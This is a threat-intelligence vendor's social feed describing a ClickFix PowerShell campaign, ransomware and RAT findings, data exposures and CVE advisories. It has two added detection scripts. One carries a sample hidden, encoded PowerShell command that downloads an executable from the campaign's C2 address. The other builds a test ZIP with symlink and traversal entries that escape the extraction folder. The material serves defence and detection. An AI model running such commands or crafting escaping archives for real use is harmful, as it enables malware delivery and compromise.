Cyberthint (@cyberthint)

561 posts

Cyberthint - Unified Cyber Threat Intelligence Platform #threatintelligence #cti #cyberintelligence #cybint

Cyber Space · Joined June 2019
2 Following · 5.4K Followers
Cyberthint @cyberthint
During our routine threat hunting activities, we detected a new active #ClickFix campaign. Typical: what initially appears to be "robot verification" is actually direct malware distribution.

ATTACK CHAIN
1) Fake verification page → 151.243.18[.]254
2) User is prompted to run a PowerShell command
3) The Base64-encoded command script is decoded and connects to C2 → 94.26.83[.]199
4) Payload is downloaded → /download

CRITICAL POINTS
- The file name changes with each download: "imagetransfer.exe", "audiobackup.exe", "archive_report.exe", "new-photo.exe"
- Each downloaded file has a different name but the same SHA256 hash
- TLS SNI camouflage: "ecs.office.com", "cdn.steamstatic.com"

TECHNICAL BEHAVIORS
Base64 encoding, obfuscation, payload download via PowerShell, %TEMP% drop, silent execution with "-WindowStyle Hidden", console hiding, runtime parsing (GetProcAddress)

CAPABILITIES
Persistence (registry + startup), clipboard data collection, webcam access, file system discovery, command execution.

#IOCs
IPs: 151.243.18[.]254, 94.26.83[.]199
Paths: /check, /download
Hash (SHA256): 7d3654531c32d941b8cae81c4137fc542172bfa9635f169cb392f245a0a12bcb
Registry: HKCU\Software\Microsoft\Windows\CurrentVersion\Run

#threathunting #malwareanalysis #powershell #blueteam #soc #dfir #ioc #cyberthreat #cyberthint
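As an added example (not code from the Cyberthint post), the behaviours listed above can be turned into a triage check over process-creation command lines: it decodes -EncodedCommand blobs, flags the hidden-window, download-cradle and %TEMP% patterns, and matches the post's IPs and paths. The sample command lines and the scoring weights are constructed for illustration.

```python
import base64
import re

# Indicators as listed in the post (kept defanged as written, refanged at load time).
CAMPAIGN_IPS = {ip.replace("[.]", ".") for ip in ("151.243.18[.]254", "94.26.83[.]199")}
CAMPAIGN_PATHS = ("/check", "/download")
RUN_KEY = r"software\microsoft\windows\currentversion\run"

# "-WindowStyle Hidden" and the abbreviations powershell.exe accepts (-w hidden).
HIDDEN_RE = re.compile(r"(?i)(?:-|/)(?:windowstyle|win|w)\s+hidden")
# "-EncodedCommand" and its prefix forms (-e, -ec, -en, -enc) followed by a base64 blob.
ENC_RE = re.compile(r"(?i)(?:-|/)e(?:ncodedcommand|nc|n|c)?\s+([A-Za-z0-9+/=]{16,})")
CRADLE_RE = re.compile(r"(?i)invoke-webrequest|\biwr\b|downloadfile|downloadstring|start-bitstransfer")
TEMP_RE = re.compile(r"(?i)\$env:temp|%temp%")

# Constructed weights: behaviour hits are weak alone, a campaign IOC hit is strong alone.
WEIGHTS = {"hidden_window": 2, "encoded_command": 2, "download_cradle": 2,
           "temp_drop": 1, "run_key_persistence": 2}
IOC_WEIGHT = 5


def decode_encoded_command(cmdline: str):
    """Return the decoded -EncodedCommand script (base64 of UTF-16LE), or None."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze_cmdline(cmdline: str):
    """Score one command line; returns (verdict, findings)."""
    findings = []
    decoded = decode_encoded_command(cmdline)
    text = cmdline if decoded is None else cmdline + "\n" + decoded  # scan both layers
    if HIDDEN_RE.search(cmdline):
        findings.append("hidden_window")
    if decoded is not None:
        findings.append("encoded_command")
    if CRADLE_RE.search(text):
        findings.append("download_cradle")
    if TEMP_RE.search(text):
        findings.append("temp_drop")
    if RUN_KEY in text.lower():
        findings.append("run_key_persistence")
    findings += ["c2_ip:" + ip for ip in sorted(CAMPAIGN_IPS) if ip in text]
    findings += ["c2_path:" + p for p in CAMPAIGN_PATHS if p in text]
    score = sum(IOC_WEIGHT if f.startswith("c2_") else WEIGHTS[f] for f in findings)
    verdict = "alert" if score >= 6 else "review" if score >= 3 else "benign"
    return verdict, findings


def encode_ps(script: str) -> str:
    """Build an -EncodedCommand argument the way PowerShell expects it (UTF-16LE, base64)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample command lines (not real telemetry from the campaign).
SAMPLE_CMDLINES = [
    "powershell.exe -ExecutionPolicy Bypass -File C:\\scripts\\backup.ps1",
    "powershell.exe -NoProfile -WindowStyle Hidden -EncodedCommand " + encode_ps(
        "$u='http://94.26.83.199/download';$f=\"$env:TEMP\\new-photo.exe\";"
        "Invoke-WebRequest -Uri $u -OutFile $f"),
    "powershell -w hidden -enc " + encode_ps("Get-Date"),
    "powershell -c \"iwr http://151.243.18.254/check\"",
]
```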
Cyberthint @cyberthint
The New Model of Threat Actors: AI-Powered 0-Day Operations

As the Cyberthint Team, we have analyzed cases where artificial intelligence is no longer used merely as an advisor for attackers, but as a direct operator. Campaigns documented in the fourth quarter of 2025 demonstrate that the discovery of a zero-day vulnerability has evolved from a specialized process taking months to one that can be automated in a matter of minutes.

Featured Cases:
- GTG-1002 (Chinese state-sponsored): 80-90% of the operation was delegated to AI; the AI discovered and exploited a 0-day vulnerability in a live operation.
- LAMEHUG (APT28 / GRU 26165): Malware that generates commands at runtime by sending queries to the Qwen2.5-Coder model via Hugging Face.
- MalTerminal: The earliest identified example of its kind, generating ransomware and reverse shell code at runtime using GPT-4.
- PROMPTFLUX: A polymorphic dropper that rewrites its source code hourly using the Gemini API.

Why the current classical detection model is insufficient, what the defense side should invest in, the operational discipline of the actors, and more, all here 🔗 cyberthint.io/the-new-operat…

#CyberSecurity #ThreatIntel #AIThreats #ZeroDay #APT28 #GTG1002 #MalwareAnalysis #LLMSecurity #Infosec #Cyberthint #ThreatHunting #RedTeam #CTI
Cyberthint @cyberthint
Thai-Based Malware Staging Server Uncovered

During our recent threat hunting operations, we identified an exposed open directory hosted on a Thai ISP infrastructure, serving on a non-standard port. What initially appeared to be a misconfigured Lighttpd server quickly revealed a far more concerning picture upon deeper analysis.

🧩 Infrastructure Fingerprint
• Host: 183.89.248.17[:]60000
• Web Server: Lighttpd on Debian GNU/Linux
• ISP: Triple T Broadband (3BB), Nonthaburi, Thailand

⚠️ Malicious Artifacts Identified
Static analysis of the binary retrieved from the directory revealed the following indicators:
- ELF Binaries (Linux x86-64 — GCC Debian 10.2.1); "case-kkthai"

Two separate ELF executables with identical import tables but differing obfuscated string blocks — consistent with a build-time payload differentiation pattern:
• ptrace + /proc/[PID]/as access → Process Memory Injection capability
• argv[0] manipulation with hardcoded failure string "E: neither argv[0] nor $_ works." → Process Cloaking attempt
• fork + execvp + waitpid chain → Daemonization & Persistence mechanism
• putenv + getenv → Runtime environment manipulation

#CTI #ThreatIntelligence #ThreatHunting #MalwareAnalysis #OpenDirectory #InfoSec #CyberSecurity #ProcessInjection #ELF #Thailand #opendir
Cyberthint @cyberthint
Critical Data Exposure: Unprotected ERP Database & KYC Documents Discovered

During our threat hunting operations, we identified an open directory at the address "148.66.129[.]125". This situation appears to have a much greater impact than a typical misconfiguration.

📂 What's Exposed?
This server is not just misconfigured — it appears to be an actively used ERP/MDM (Master Data Management) system (‘simpmdmExpro’) with its entire backend left publicly accessible:
- ‘material_master_128167.sql’ — Full material master database dump
- ‘duplicate_records_50000_99999.sql’ — 50K+ record dataset
- ‘simpmdmExpro_contabo_10_april.sql’ — Live production database backup
- ‘simpmdmExpro.zip’ — Complete application archive
- ‘/simpmdm/’ — Live application directory

⚠️ Most Critical Finding: KYC Document Leak
Example: inside the exposed zip file, the path ‘simpmdmExpro/UploadDocument/KYC/’ contains hundreds of sensitive identity & financial documents:
- Customer invoices (2023–2025)
- Financial statements
- Identity verification documents (PNG/JPEG scans)
- Internal request and communication files

#CTI #ThreatIntelligence #DataLeakage #InfoSec #CyberSecurity #ThreatHunting #OpenDirectory #opendir #GDPR
Cyberthint @cyberthint
New RaaS Platform Discovered: HYFLOCK

In our recent extensive threat hunting operations, we uncovered a new, previously undocumented RaaS (Ransomware-as-a-Service) platform operating on the Tor network: HYFLOCK (http[:]//e5hdifgit6ua7k4ggmltume7kbyryksdnlrkc55we33fnshgxfeqgsyd[.]onion/)

Our team not only mapped the outer surface of the target (traces like Chinese comment lines hidden in CSS files), but also went behind the authentication layer, directly accessing the operational management panel and the current user manuals (v1.0.0) used by cybercriminals. This firsthand intelligence clearly reveals the corporate workings of modern ransomware groups.

Here are the critical findings we've uncovered from the depths of Operation HYFLOCK:

🔍 Cross-Platform Builder Automation: Affiliates can log into the panel and compile target-specific malware (encryptor) within minutes. The system supports Windows, Linux/NAS, and ESXi platforms. A new hash is generated with each compilation, rendering static analysis security measures ineffective.

⚙️ Advanced Operating Parameters: The parameters included in the guide show how attackers adapt their tactics (TTPs) depending on the target:
- "--gpospread": Automatic deployment via GPO in Active Directory environments (with Domain Admin privileges).
- "--network-only": Only encrypt network shares and cloud storage areas.
- "--delete-shadows": Deleting shadow copies prevents recovery.

💰 Trustless Business Model and Separation of Powers: The system operates with an 80% affiliate commission and a 20% platform commission. The most notable OPSEC (Opposition-to-Personal Security) measure is that affiliates never have access to the decryptor. Once negotiations are complete, the key is directly transmitted to the victim by the system administrators. This strict rule prevents commission evasion while also protecting infrastructure administrators.

🌐 Underground Market: HYFLOCK is not just a ransomware panel; it also houses an integrated marketplace ecosystem where attackers can buy and sell exploit code, leaked databases, and privilege escalation tools among themselves. The traces of Chinese developers we identified in the code structure and the global marketing of the platform with Russian/English interfaces demonstrate the latest stage in international subcontracting within the cybercrime world.

The images show the panel's internal interface and details of the directory used by the attackers among themselves.

#CTI #ThreatIntelligence #Ransomware #HYFLOCK #RaaS #CyberSecurity #InfoSec #MalwareAnalysis #ThreatHunting #Cybercrime
Cyberthint @cyberthint
New #Wallet #Drainer Campaign Aimed at Developers!

Attackers are weaponizing the #GitHub notification infrastructure and #Google Share redirections to bypass email security filters. #Web3 developers carefully selected via #OSINT are lured to a fake #OpenClaw #Airdrop page, where their wallets are instantly drained.

Detailed technical analysis, TTPs, and an #IoC list are available in our research report: 🔗 cyberthint.io/lotl-threat-in…

#CyberSecurity #Web3 #WalletDrainer #GitHub #CTI #Phishing #Cyberthint #ThreatIntel #ThreatIntelligence
Cyberthint @cyberthint
We discovered a new BEC infrastructure: What happens when a 20-year-old domain is used in a BEC attack? An analysis of a phishing attack using a malicious SVG file.

The "001VIEW_Remittance_Advice.svg" file we analyzed is malware disguised as a remittance advice. It contains JavaScript obfuscated with XOR and Base64. ...

📝 You can read our analysis here: cyberthint.io/what-happens-w…

#BEC #Phishing #ThreatIntel #Cyberthint #CyberSecurity #InformationSecurity
Cyberthint @cyberthint
KarstoRat Malware Analysis: A Small Bug Revealed the Developer!

We have completed our comprehensive investigation into KarstoRat, an advanced modular malware first detected in February 2026. In the world of cybercrime, anonymity is often an illusion. Sometimes, a single digital footprint can be enough to bring down an entire operation.

📌 Full Technical Report: cyberthint.io/case-study-kar…
🛡️ Detection Rules (Sigma, Yara, Snort) now available in our repo: github.com/cyberthint/Det…

#CyberSecurity #KarstoRat #ThreatIntel #MalwareAnalysis #Infosec #OSINT #CyberEspionage #DigitalForensics #DetectionEngineering
Cyberthint @cyberthint
ZeroDayRAT - Mobile Espionage and Financial Theft Platform

As the Cyberthint research team, we analyzed a new mobile threat called ZeroDayRAT, which is being marketed in the Telegram underworld and claims to target both Android and iOS devices with a 1-click attack.

🔍 Key Findings:
- Capabilities: Live camera/microphone monitoring, Keylogger, and Crypto Wallet theft (Clipboard Injection).
- Distribution: Security filters are bypassed using shortened links via WhatsApp and GitHub Pages.
- HUMINT Analysis: The seller accepts the XSS Forum Escrow service for credibility.

This threat straddles the fine line between a genuine MaaS operation and scam marketing. Detailed technical analysis and IoCs in our report.
🔗 cyberthint.io/zerodayrat-a-n…

#ZeroDayRAT #CyberSecurity #MobileSecurity #ThreatIntel #MalwareAnalysis #Infosec #Android #iOS #Cyberthint #MobileThreat #Espionage
Cyberthint @cyberthint
🚀 The Anticipated Report is Out: 2025 Global Cyber Threat Intelligence and 2026 Forecasts

2025 was a year that changed the rules of the game in cybersecurity. Attackers are no longer just encrypting data; they are halting production lines and crippling supply chains. In our 2025 Global Cyber Threat Intelligence Annual Report, prepared by the Cyberthint Threat Hunters team, we analyze the most critical incidents of the past year, address security vulnerabilities, and shed light on the cyber threats and AI-versus-AI war that await us in 2026.

📊 What's in Store for You in the Report?
🔹 Ransomware Evolution: Behind the scenes of the Jaguar Land Rover and Ingram Micro attacks and Operational Shutdown tactics.
🔹 Black Market 2025: The shift from identity theft to session hijacking. Why is MFA no longer sufficient?
🔹 Zero-Day Exploits: The rise of access brokers and 2025's most critical vulnerabilities (Ivanti, Oracle EBS, Fortinet, etc.).
🔹 2026 Predictions: AI-SOC structures making decisions independent of human intervention and autonomous attack agents.
🔹 And furthermore...

This report is not just a situation assessment; it is a roadmap for your 2026 strategy.

📥 You can visit our webpage to read or download the report: cyberthint.io/global-cyber-t…

#CyberSecurity #CTI #ThreatIntelligence #Ransomware #AI #Cyberthint #Infosec #2025Report #CISO
Cyberthint @cyberthint
"Frogblight" Banking #Malware Targeting #Türkiye

We analyzed #Frogblight, a new Android malware targeting users in Türkiye and spreading via fake "e-ifade / Dava Dosyası" applications.

🔍 Technical Insights & Origin:
- Infection: Fake UYAP links sent via SMS.
- Capabilities: Steals bank credentials and SMS messages (OTP) via WebView injection.
- Critical Findings: Turkish comment lines were found in the malware's source code. Additionally, our GitHub analysis indicates that the attackers are linked to the dangerous Coper (MaaS) malware and may be part of an experienced criminal network.

🔗 Detailed technical analysis and IoC list are available: cyberthint.io/there-is-a-law…

#Frogblight #AndroidMalware #CyberSecurity #CTI #ThreatIntel #BankingTrojan #MalwareAnalysis #fr0g #Coper
Cyberthint @cyberthint
Active Attacks Observed on #FortiGate Devices!

The CVE-2025-59718 and CVE-2025-59719 vulnerabilities (CVSS 9.8) affecting #Fortinet products (FortiOS, FortiWeb, FortiProxy, and FortiSwitchManager) allow attackers to bypass authentication entirely by manipulating SAML SSO, thereby gaining admin privileges.

⚠️ Status: Active exploitation has been observed. Attackers are exporting device configurations.

Our technical analysis and urgent defense/monitoring steps are published in our blog.
🔗 cyberthint.io/actively-attac…

#CyberAttack #CVE_2025_59718 #AuthBypass #CTI #Cybersecurity #Cyberthint #ThreatIntelligence
Cyberthint @cyberthint
Critical LPE (CVE-2025-66430) Vulnerability for #Plesk 👉 cyberthint.io/critical-privi…

A local privilege escalation (LPE) vulnerability identified as "CVE-2025-66430" with a "CVSS 9.1" severity score has been detected in the widely used Plesk platform. This vulnerability allows any Plesk user with limited privileges to inject malicious data into the Apache configuration, enabling them to execute arbitrary commands on the server with "root" privileges. This poses a risk of cross-contamination to all server commands and customer data, particularly in shared hosting environments.

ACTIONS:
- Patch Application: Micro-updates released for Plesk versions 18.0.70 – 18.0.74 must be applied immediately and without delay.
- Access Control: Access to the Password-Protected Directories feature must be restricted to authorized personnel only.
- Anomaly Monitoring: SIEM monitoring rules must be defined immediately for root command execution attempts originating from restricted Plesk accounts.

#Plesk #CVE_2025_66430 #LPE #ServerSecurity #CTI #CyberSecurity #threatintel #threatintelligence #infosec #vulnerability #Cyberthint
Cyberthint @cyberthint
The failed "insider" attempt targeting CrowdStrike was not an isolated incident; it was a harbinger of a strategic shift. Following a failed $25,000 bribery attempt, the group changed tactics and is now focusing on hybrid cloud infrastructures.

Our analysis shows that the Scattered LAPSUS$ Hunters (SLH) group has abandoned its "affiliate" model and transitioned to its own RaaS infrastructure, the "ShinySp1d3r" platform.

🚩 Highlights from the Report:
- Strategic Shift: The failed intrusion attempt pushed the group toward a more aggressive "Initial Access" process.
- New TTPs: The attack vector shifted from Windows AD to Linux/LDAP configurations and SSH keys (.pem).
- Targets: Telecom and BPO giants, particularly in "Five Eyes" countries.

For details on this new structure and technical analysis, check out our article 👉 cyberthint.io/the-strategic-…

#ThreatIntelligence #CrowdStrike #ShinySp1d3r #InsiderThreat #LAPSUS$ #CyberSecurity #InfoSec #RaaS
Cyberthint @cyberthint
North Korean "Synthetic Employees": Next-Generation Infiltration Operations Masked with Artificial Intelligence

As of 2025, North Korea-linked threat actors are emerging not only through financial fraud but also through cyber infiltration strategies involving remote recruitment. In this case, the #Lazarus threat actor’s sub-group “Famous Chollima” attempted to secure a position at a Western tech company using fake resumes and AI-based facial filters.

👉 cyberthint.io/north-korean-s…
Cyberthint @cyberthint
Apache Tomcat Flaws Allow Remote Code Execution

Two high-severity flaws in #ApacheTomcat (CVE-2025-55752 & CVE-2025-55754) pose a significant risk, including potential remote code execution (#RCE).

The most critical flaw (CVE-2025-55752, "Important") is a directory traversal vulnerability. This allows attackers to bypass security constraints protecting sensitive directories like "/WEB-INF/" and "/META-INF/". These vulnerabilities affect Apache #Tomcat versions "9, 10, and 11 before" the latest patch. If "PUT" requests are enabled, attackers can exploit this to upload malicious files (e.g., JSP web shells) directly to the server, achieving RCE.

The second flaw (CVE-2025-55754) allows console manipulation via malicious log entries.

ACTIONS:
• Update to Apache Tomcat 9.0.109, 10.1.45, or 11.0.11 immediately.
• Review server configurations and ensure "PUT" requests are restricted to trusted users.
• SOC teams should monitor for unusual file writes to "/WEB-INF/" or "/META-INF/" directories.

#cybersecurity #threatintel #threatintelligence #infosec #vulnerability #CVE #patchmanagement #securityupdate #java
Cyberthint @cyberthint
🚨 MS Windows Remote Access Connection Manager (RasMan) Service 0-Day Vulnerability Actively Exploited in Attacks

Our technical report on Windows RasMan (CVE-2025-59230) has been published. Microsoft patched the vulnerability on October 14, 2025; however, unpatched systems still pose a high risk. This vulnerability affects multiple Windows versions and has therefore attracted the attention of threat actors targeting enterprise environments.

The report details the technical aspects of the vulnerability, the threat actor perspective, rapid detection, and emergency mitigation steps. It includes an actionable playbook for SOC and IT teams. Our recommendation is to update all your systems and run a 30-day retroactive security audit.

#CyberSecurity #ThreatIntelligence #CVE2025_59230 #ZeroDay #Windows #PatchNow #InfoSec #CTI #Ransomware

cyberthint.io/windows-rasman…
Cyberthint @cyberthint
A New RCE Vulnerability for 7-Zip

Two high-severity flaws in #7Zip (CVE-2025-11001 & CVE-2025-11002, CVSS 7.0) allow a crafted ZIP file to abuse symbolic links and write outside the extraction folder, leading to potential code execution with user privileges. These vulnerabilities affect all versions before 25.00 on #Windows, #macOS, and #Linux.

Attackers could drop payloads into startup or system paths via a single extract action. Such vulnerabilities in 7-Zip provide attackers with an opportunity to launch social engineering attacks via email.

ACTIONS:
• Update to 7-Zip 25.00 immediately.
• Avoid extracting files from untrusted sources.
• SOC teams should monitor for unusual writes to startup or system directories after extraction.

#cybersecurity #threatintel #infosec #7zip #vulnerability #CVE #zeroday #patchmanagement #securityupdate
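As an added example (neither 7-Zip's code nor the post's), the archive shape described above, a symbolic link pointing outside the extraction folder followed by a file placed under that link, can be caught before extraction by inspecting the ZIP central directory; the scanner also flags plain ".." traversal. The sample archive is constructed in memory and is not a real malicious file.

```python
import io
import posixpath
import stat
import zipfile


def _escapes(path: str) -> bool:
    """True if a normalised archive path would land outside the extraction root."""
    norm = posixpath.normpath(path.replace("\\", "/"))
    return (norm.startswith("/") or norm == ".." or norm.startswith("../")
            or (len(norm) > 1 and norm[1] == ":"))


def audit_zip(data: bytes):
    """Return [(entry, reason)] for entries that could write outside the extraction folder."""
    problems = []
    symlinks = {}  # normalised link path -> link target, in archive order
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            name = info.filename
            norm = posixpath.normpath(name.replace("\\", "/"))
            if _escapes(name):
                problems.append((name, "path traversal"))
            # A parent directory delivered earlier as a symlink: the file body would be
            # written through that link, wherever it points (the 7-Zip abuse pattern).
            parent = posixpath.dirname(norm)
            while parent:
                if parent in symlinks:
                    problems.append((name, f"written through symlink {parent!r} -> {symlinks[parent]!r}"))
                    break
                parent = posixpath.dirname(parent)
            if stat.S_ISLNK(info.external_attr >> 16):   # Unix mode bits live in the high word
                target = zf.read(info).decode("utf-8", "replace")
                symlinks[norm] = target
                resolved = posixpath.normpath(posixpath.join(posixpath.dirname(norm), target))
                if _escapes(resolved):
                    problems.append((name, f"symlink escapes extraction root -> {target!r}"))
    return problems


def build_sample_zip() -> bytes:
    """Constructed archive: a benign file, a link escaping the root, a file under it, a traversal name."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("readme.txt", "harmless")
        link = zipfile.ZipInfo("photos")
        link.create_system = 3                              # Unix, so the mode bits are honoured
        link.external_attr = (stat.S_IFLNK | 0o777) << 16   # S_IFLNK marks a symlink entry
        zf.writestr(link, "../../")                          # link body is the target path
        zf.writestr("photos/new-photo.exe", "payload placeholder")
        zf.writestr("../outside.txt", "classic traversal")
    return buf.getvalue()
```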